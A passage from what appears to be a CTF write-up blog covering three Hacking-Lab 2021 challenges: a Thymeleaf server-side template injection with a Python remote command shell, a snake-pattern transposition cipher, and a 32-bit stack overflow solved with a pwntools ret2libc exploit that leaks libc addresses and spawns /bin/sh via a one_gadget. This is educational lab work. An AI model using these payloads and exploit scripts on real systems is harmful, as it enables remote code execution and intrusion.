class=\"hl\">he2021{f1sh_r_fr1ends_n0t_f00d!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_34\">HE21.34 The Five Seasons<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge34.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">8 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nDid you know there were five seasons?\r\n\r\nFind the flag file!\r\n\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2111<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\nThe &#x1F41F; is just a trap &#x1F63C;\r\n\r\nA hint is hiding in one of the poems.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nOn the provided website one of five seasons can be selected:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_01.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe page of each season contains a poem:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_02.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWhen providing a non-existing season in the GET-parameter (e.g. <span class=\"hl\">xx<\/span>), an error is displayed stating that the template <span class=\"hl\">page-xx<\/span> was not found:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_03.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAccording to the hint we should look for a hint in one of the poems. In order to do this I downloaded the original poems and compared them with the poems on the page. This yield the following difference:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/34]\r\n\u2514\u2500$ diff sp.txt sp_on.txt\r\n6c6\r\n&lt; In the blossom-robed Thyme Leaves;\r\n---\r\n&gt; In the blossom-robed trees;\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe word <span class=\"hl\">trees<\/span> from the original poem were replaced by <span class=\"hl\">Thyme Leaves<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nCombining this with the error message suggests that we are dealing with a <span class=\"hl\">Thyme Leaves<\/span> <a href=\"https:\/\/portswigger.net\/research\/server-side-template-injection\" rel=\"noopener noreferrer\" target=\"_blank\">SSTI<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nBy googling a little bit I came upon <a href=\"https:\/\/www.fatalerrors.org\/a\/sprboot-thymeleaf-template-injection-for-java-security-development.html\" rel=\"noopener noreferrer\" target=\"_blank\">this<\/a> blog post, which describes this kind of vulernability and also provides a payload to execute OS commands:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22whoami%22).getInputStream()).next()%7d__::.x\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can directly use this payload in the GET-parameter <span class=\"hl\">season<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_04.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nIt might not be too obvious at first, but we actually executed the command <span class=\"hl\">whoami<\/span>. The result is displayed in the template name: <span class=\"hl\">seasons<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nAfter testing different commands it turned out that the response will only contain characters until the first whitespace. If we e.g. run <span class=\"hl\">ls<\/span>, we only see the first file in the response:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_05.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAlso a pipe (<span class=\"hl\">|<\/span>) cannot be used directly in the command <span class=\"hl\">String<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nWhen initially solving the challenge, I verified that the file <span class=\"hl\">flag.txt<\/span> exists by running <span class=\"hl\">ls flag.txt<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_06.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nIn order to output in we can use <span class=\"hl\">base64 -w0 flag.txt<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_07.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to decode it:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/34]\r\n\u2514\u2500$ echo d2VsbCBkb25lLCBoZXJlIGlzIHlvdXIgZmxhZzogaGUyMDIxe1NwcjFuZ18xc19teV9mNHZydF9zMzRzbiF9|base64 -d\r\nwell done, here is your flag: he2021{Spr1ng_1s_my_f4vrt_s34sn!}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThough it is also possible to run arbitrary commands and get the full output.\r\n<\/p>\r\n\r\n<p>\r\nFor this to work a <span class=\"hl\">String<\/span> array like <span class=\"hl\">{&#8220;sh&#8221;,&#8221;-c&#8221;,&#8221;ls|base64&#8243;}<\/span> must be provided to <span class=\"hl\">getRuntime().exec<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe following script does this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport requests\r\nfrom base64 import b64decode\r\n\r\ndef run_cmd(cmd):\r\n  url = 'http:\/\/46.101.107.117:2111\/season?season='\r\n  url += '__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(new String[]{\"sh\",\"-c\",\"'+cmd+'|base64 -w0\"}).getInputStream()).next()}__::i.x '\r\n  r = requests.get(url)\r\n  return b64decode(r.text.split('[page-')[1].split('], ')[0]).decode()\r\n\r\nwhile True:\r\n  c = input('&gt; ')\r\n  print(run_cmd(c))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThis way it is a little bit more comfortable to run commands:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/34]\r\n\u2514\u2500$ .\/shell0r.py                                                                                                                                                   1 \u2a2f\r\n&gt; id\r\nuid=999(seasons) gid=999(seasons) groups=999(seasons)\r\n\r\n&gt; ls -al\r\ntotal 19440\r\ndrwxr-xr-x 1 root root     4096 Mar  2 13:23 .\r\ndrwxr-xr-x 1 root root     4096 Apr 15 09:01 ..\r\n-rwxr-xr-x 1 root root 19888619 Mar  2 13:23 app.jar\r\n-rwxr-xr-x 1 root root       63 Mar  2 13:23 flag.txt\r\n-rwxr-xr-x 1 root root       41 Mar  2 13:23 start.sh\r\n\r\n&gt; cat flag.txt\r\nwell done, here is your flag: he2021{Spr1ng_1s_my_f4vrt_s34sn!}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{Spr1ng_1s_my_f4vrt_s34sn!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_35\">HE21.35 The Snake<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge35.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">8 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nCunning snake has a little riddle for you:\r\n\r\n<span class=\"hl\">21{_inake0dltn_2olospena__iht_fthet!}<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\n- It's a self-made algorithm, not one you'll find in the web.\r\n- Look at the snake in the title image.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nIt was quite challenging to find the correct pattern. Thanks to <span class=\"hl\">daubsi<\/span> for a heads-up.\r\n<\/p>\r\n\r\n<p>\r\nI ended up with this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nDIRECTION   CHARACTERS                              SUBSTRING\r\n-------------------------------------------------------------\r\n            21{_inake0dltn_2olospena__iht_fthet!}\r\n   &lt;-                3     2     1     0            he20\r\n   -&gt;       456       7     8     9     abc         21{dont_f\r\n   &lt;-                  f     e     d                all\r\n   -&gt;          012      3     4     5      678      _into_the\r\n   &lt;-                    b     a     9              _sn\r\n   -&gt;             cde     f     0     1       234   ake_pit!}\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{dont_fall_into_the_snake_pit!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_36\">HE21.36 Doldrums<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge36.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">8 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Pwn<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>daubsi<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nWithout wind, no ship can sail.\r\n\r\nThis one is really secure. I promise!\r\n\r\n<span class=\"hl\">nc 46.101.107.117 2113<\/span>\r\n\r\nGet a shell and read the flag.\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<span class=\"fake_link\">doldrums<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nUbuntu 18.04 64 Bit\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe setting for this last pwn binary was a little bit different mainly because we are dealing with a 32-bit ELF file, which is stripped. Again it is dynamically linked, without canaries, nx enabled, no pic and partial relro:\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ file doldrums \r\ndoldrums: <span class=\"hl2\">ELF 32-bit<\/span> LSB executable, Intel 80386, version 1 (SYSV), <span class=\"hl2\">dynamically linked<\/span>, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=d035ad0d34a664be7426cd2196a55c38438e19cc, <span class=\"hl2\">stripped<\/span>\r\n                                                                                                                                                                       \r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ r2 -A doldrums                \r\n[x] Analyze all flags starting with sym. and entry0 (aa)\r\n[x] Analyze function calls (aac)\r\n[x] Analyze len bytes of instructions for references (aar)\r\n[x] Check for objc references\r\n[x] Check for vtables\r\n[x] Type matching analysis for all functions (aaft)\r\n[x] Propagate noreturn information\r\n[x] Use -AA or aaaa to perform additional experimental analysis.\r\n[0x080484d0]&gt; iI\r\narch     x86\r\nbaddr    0x8048000\r\nbinsz    5928\r\nbintype  elf\r\nbits     32\r\n<span class=\"hl2\">canary   false<\/span>\r\nclass    ELF32\r\ncompiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0\r\ncrypto   false\r\nendian   little\r\nhavecode true\r\nintrp    \/lib\/ld-linux.so.2\r\nladdr    0x0\r\nlang     c\r\nlinenum  false\r\nlsyms    false\r\nmachine  Intel 80386\r\nmaxopsz  16\r\nminopsz  1\r\n<span class=\"hl2\">nx       true<\/span>\r\nos       linux\r\npcalign  0\r\n<span class=\"hl2\">pic      false<\/span>\r\nrelocs   false\r\n<span class=\"hl2\">relro    partial<\/span>\r\nrpath    NONE\r\nsanitiz  false\r\nstatic   false\r\nstripped true\r\nsubsys   linux\r\nva       true\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nSince the binary is stripped, I used <span class=\"hl\">ghidra<\/span> this time, which makes it a little bit more comfortable.\r\n<\/p>\r\n\r\n<p>\r\nAt first we search for the <span class=\"hl\">entry<\/span> function. The function passed to the call to <span class=\"hl\">__libc_start_main<\/span> is the actual <span class=\"hl\">main<\/span> function (I already renamed it here):\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_36_01.png\" alt=\"Pwn\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWithin the <span class=\"hl\">main<\/span> function we can see that yet again the unsafe <span class=\"hl\">gets<\/span> is used:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_36_02.png\" alt=\"Pwn\"\/>\r\n<\/p>\r\n\r\n<p>\r\nSince there are no stack canaries, we can use this to overflow the return address on the stack.\r\n<\/p>\r\n\r\n<p>\r\nLet&#8217;s begin by determining the offset to the return address again:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ <span class=\"hl2\">gdb .\/doldrums<\/span>\r\nReading symbols from .\/doldrums...\r\n(No debugging symbols found in .\/doldrums)\r\ngdb-peda$ <span class=\"hl2\">pattern_create 200 \/tmp\/pattern<\/span>\r\nWriting pattern of 200 chars to filename \"\/tmp\/pattern\"\r\ngdb-peda$ <span class=\"hl2\">r < \/tmp\/pattern<\/span>\r\nStarting program: \/home\/kali\/ctf\/he21\/36\/doldrums &lt; \/tmp\/pattern\r\nWelcome! Here is a nice rime of the poet Samuel Taylor Coleridge for you!\r\nPlease press a key to continue!\r\n\r\n[Attaching after process 45833 vfork to child process 45837]\r\n[New inferior 2 (process 45837)]\r\n[Detaching vfork parent process 45833 after child exit]\r\n-------------------------------------------------------\r\nHear the rime of the ancient mariner\r\nSee his eye as he stops one of three\r\nMemmerizes one of the wedding guests\r\nStay here and listen to the nightmates of the sea\r\n\r\n...\r\n\r\nMore info? https:\/\/en.wikipedia.org\/wiki\/The_Rime_of_the_Ancient_Mariner\r\n\r\n[Inferior 1 (process 45833) detached]\r\n[Inferior 2 (process 45837) exited with code 0177]\r\nWarning: not running\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nOuh? We did not crash the program? The program forked due to the call to <span class=\"hl\">system<\/span>. By default <span class=\"hl\">gdb<\/span> follows the <span class=\"hl\">child<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">show follow-fork-mode <\/span>\r\nDebugger response to a program call of fork or vfork is \"<span class=\"hl2\">child<\/span>\".\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe adjust the behavior by setting <span class=\"hl\">follow-fork-mode<\/span> to <span class=\"hl\">parent<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">set follow-fork-mode parent<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can input the pattern again:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">r < \/tmp\/pattern<\/span>\r\nStarting program: \/home\/kali\/ctf\/he21\/36\/doldrums &lt; \/tmp\/pattern\r\nWelcome! Here is a nice rime of the poet Samuel Taylor Coleridge for you!\r\nPlease press a key to continue!\r\n\r\n[Detaching after vfork from child process 46194]\r\n-------------------------------------------------------\r\nHear the rime of the ancient mariner\r\n...\r\nProgram received signal <span class=\"hl2\">SIGSEGV, Segmentation fault<\/span>.\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x0 \r\nEBX: 0x41417341 ('AsAA')\r\nECX: 0x51c \r\nEDX: 0xffffffff \r\nESI: 0xf7fb0000 --&gt; 0x1e4d6c \r\nEDI: 0xf7fb0000 --&gt; 0x1e4d6c \r\nEBP: 0x24414142 ('BAA$')\r\nESP: 0xffffd190 (\"ACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AA...\")\r\n<span class=\"hl2\">EIP: 0x416e4141 ('AAnA')<\/span>\r\nEFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n<span class=\"hl2\">Invalid $PC address: 0x416e4141<\/span>\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd190 (\"ACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3A...\")\r\n0004| 0xffffd194 (\"-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAA...\")\r\n0008| 0xffffd198 (\"AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4...\")\r\n0012| 0xffffd19c (\"A;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJA...\")\r\n0016| 0xffffd1a0 (\")AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA...\")\r\n0020| 0xffffd1a4 (\"AAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAK...\")\r\n0024| 0xffffd1a8 (\"A0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA...\")\r\n0028| 0xffffd1ac (\"FAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA...\")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x416e4141 in ?? ()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAt this time we stayed following the parent and can observe the crash. The instruction pointer was overwritten by the pattern. Let&#8217;s determine the offset:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">pattern_offset 0x416e4141<\/span>\r\n1097744705 found at offset: <span class=\"hl2\">13<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly the offset from the beginning of our input to the return address is <span class=\"hl\">13<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe strategy for a straightforward exploitation consists of two steps. At first we leak a few function addresses, in order to determine the libc version running on the target server. In the second step (the actual exploit) we leak one function address again (e.g. from <span class=\"hl\">puts<\/span>), calculate the libc base address (we know the offset of <span class=\"hl\">puts<\/span>, since we know the libc version), jump back to the <span class=\"hl\">main<\/span> function, in order to be able to exploit the vulnerability a second time. This time we overwrite the return address with a <span class=\"hl\">one_gadget<\/span>.\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\nAt first let&#8217;s leak the address of <span class=\"hl\">puts<\/span>. In order to do this we overwrite the return address with <span class=\"hl\">PLT<\/span> entry of <span class=\"hl\">puts<\/span> and provide the <span class=\"hl\">GOT<\/span> entry of it as the first argument. This will effectively call <span class=\"hl\">puts(&#038;puts_got)<\/span> printing the contents of the <span class=\"hl\">GOT<\/span> entry.\r\n<\/p>\r\n\r\n<p>\r\nBoth required address can be determined using <span class=\"hl\">gdb<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ p 'puts@plt'\r\n$1 = {&lt;text variable, no debug info&gt;} 0x8048480 &lt;puts@plt&gt;\r\ngdb-peda$ p &'puts@got.plt'\r\n$5 = (&lt;text from jump slot in .got.plt, no debug info&gt; *) 0x804a020 &lt;puts@got.plt&gt;\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe script looks like this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 13\r\n\r\nputs_plt = 0x08048480\r\n\r\nputs_got = 0x804a020\r\n\r\nio = remote('46.101.107.117', 2113)\r\n\r\nexpl = b'A'*offset\r\nexpl += p32(puts_plt)\r\nexpl += b'JUNK'\r\nexpl += p32(puts_got)\r\n\r\nio.sendline(expl)\r\nio.recvuntil('Mariner\\n\\n')\r\nr = io.recv(4)\r\nio.close()\r\n\r\nleak = int.from_bytes(r, 'little')\r\nlog.info('leak: ' + hex(leak))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script outputs the absolute address of <span class=\"hl\">puts<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ .\/leak.py\r\n[+] Opening connection to 46.101.107.117 on port 2113: Done\r\n[*] Closed connection to 46.101.107.117 port 2113\r\n[*] <span class=\"hl2\">leak: 0xf7dbf460<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn order to further narrow down the possible libc version, we use a second function (<span class=\"hl\">gets<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n...\r\n<span class=\"hl2\">gets_got = 0x804a010<\/span>\r\n\r\n...\r\n\r\nexpl = b'A'*offset\r\nexpl += p32(puts_plt)\r\nexpl += b'JUNK'\r\nexpl += p32(<span class=\"hl2\">gets_got<\/span>)\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the adjusted script outputs the absolute address of <span class=\"hl\">gets<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ .\/leak.py \r\n[+] Opening connection to 46.101.107.117 on port 2113: Done\r\n[*] Closed connection to 46.101.107.117 port 2113\r\n[*] <span class=\"hl2\">leak: 0xf7d84be0<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWith those two addresses we can use a <a href=\"https:\/\/libc.blukat.me\/\" rel=\"noopener noreferrer\" target=\"_blank\">libc database search<\/a>, in order to determine the libc version running on the server:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_36_03.png\" alt=\"Libc\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly the server is using <span class=\"hl\">libc6-i386_2.27-3ubuntu1.4_amd64<\/span>. \r\n<\/p>\r\n\r\n<p>\r\nHow does this work? The leaked addresses are influenced by <span class=\"hl\">ASLR<\/span>. This also means that they change every time we run the leak script. Though <span class=\"hl\">ASLR<\/span> does not influence the whole address but only <span class=\"hl\">12<\/span> bits of it (assuming 32-bit). We can see this by running <span class=\"hl\">ldd<\/span> a few times:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ ldd doldrums|grep libc\r\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7<span class=\"hl2\">d55<\/span>000)\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ ldd doldrums|grep libc\r\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7<span class=\"hl2\">d65<\/span>000)\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ ldd doldrums|grep libc\r\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7<span class=\"hl2\">cf7<\/span>000)\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ ldd doldrums|grep libc\r\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7<span class=\"hl2\">cd5<\/span>000)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe least significant 12 bits of the absolute address of a function will thus stay always the same. Though these 12 bits vary depending on the libc version and can thus be used to narrow down the possible version. That is what the libc database search does.\r\n<\/p>\r\n\r\n<p>\r\nWe can directly download the identified libc from the page:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ <span class=\"hl2\">wget https:\/\/libc.blukat.me\/d\/libc6-i386_2.27-3ubuntu1.4_amd64.so<\/span>\r\n...\r\nLength: 1926828 (1.8M) [application\/octet-stream]\r\nSaving to: \u2018libc6-i386_2.27-3ubuntu1.4_amd64.so\u2019\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWith the libc at hand we can identify all <a href=\"https:\/\/github.com\/david942j\/one_gadget\" rel=\"noopener noreferrer\" target=\"_blank\">one_gadgets<\/a> within it:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ <span class=\"hl2\">one_gadget libc6-i386_2.27-3ubuntu1.4_amd64.so<\/span>\r\n0x3ccea execve(\"\/bin\/sh\", esp+0x34, environ)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp+0x34] == NULL\r\n\r\n0x3ccec execve(\"\/bin\/sh\", esp+0x38, environ)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp+0x38] == NULL\r\n\r\n0x3ccf0 execve(\"\/bin\/sh\", esp+0x3c, environ)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp+0x3c] == NULL\r\n\r\n0x3ccf7 execve(\"\/bin\/sh\", esp+0x40, environ)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp+0x40] == NULL\r\n\r\n0x6739f execl(\"\/bin\/sh\", eax)\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  eax == NULL\r\n\r\n0x673a0 execl(\"\/bin\/sh\", [esp])\r\nconstraints:\r\n  esi is the GOT address of libc\r\n  [esp] == NULL\r\n\r\n0x13563e execl(\"\/bin\/sh\", eax)\r\nconstraints:\r\n  ebx is the GOT address of libc\r\n  eax == NULL\r\n\r\n0x13563f execl(\"\/bin\/sh\", [esp])\r\nconstraints:\r\n  ebx is the GOT address of libc\r\n  [esp] == NULL\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can proceed to the actual exploitation. The exploit consists of two steps.\r\n<\/p>\r\n\r\n<p>\r\nAt first the address of <span class=\"hl\">puts<\/span> is leaked again, but this time in order to calculate the libc base address (influenced by <span class=\"hl\">ASLR<\/span>). For the return address of the call to <span class=\"hl\">puts<\/span> we set the address of <span class=\"hl\">main<\/span>, which will make the execution proceed at the beginning after the leak. This allows us to exploit the vulnerability a second time (just opening a second connection does not work, since the leaked address is not valid anymore).\r\n<\/p>\r\n\r\n<p>\r\nIn the second step we use the determined libc base address to calculate the absolute address of a <span class=\"hl\">one_gadget<\/span> and use this address to overwrite the return address on the stack.\r\n<\/p>\r\n\r\n<p>\r\nHere is the script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 13\r\n\r\nputs_plt = 0x08048480\r\nputs_got = 0x804a020\r\nputs_offset = 0x67460\r\nmain = 0x80485e6\r\n\r\nio = remote('46.101.107.117', 2113)\r\n\r\n# 1.) leak libc base address\r\n\r\nexpl = b'A'*offset\r\nexpl += p32(puts_plt)\r\nexpl += p32(main)\r\nexpl += p32(puts_got)\r\nio.sendline(expl)\r\nio.recvuntil('Mariner\\n\\n')\r\nr = io.recv(4)\r\nputs_addr = int.from_bytes(r, 'little')\r\nlog.info('puts_addr: ' + hex(puts_addr))\r\nlibc_base = puts_addr - puts_offset\r\nlog.info('libc_base: ' + hex(libc_base))\r\n\r\n# 2.) overwrite return address with one_gadget\r\n\r\nog = 0x3ccea\r\nexpl = b'A'*offset\r\nexpl += p32(libc_base+og)\r\nio.sendline(expl)\r\n\r\nio.interactive()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script yields a shell on the server:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ .\/final.py\r\n[+] Opening connection to 46.101.107.117 on port 2113: Done\r\n[*] puts_addr: 0xf7d8e460\r\n[*] libc_base: 0xf7d27000\r\n[*] Switching to interactive mode\r\n\\x10\\xd6\\xf70\\xfe\\xd3\\xf7\\xc0\\xeb\\xd8\\xf7\r\nWelcome! Here is a nice rime of the poet Samuel Taylor Coleridge for you!\r\nPlease press a key to continue!\r\n\r\n\u2501\u250f\u251b\u2503 \u2503\u250f\u2501\u251b  \u250f\u2501\u2503\u251b\u250f\u250f \u250f\u2501\u251b  \u250f\u2501\u2503\u250f\u2501\u251b  \u2501\u250f\u251b\u2503 \u2503\u250f\u2501\u251b  \u250f\u2501\u2503\u250f\u2501 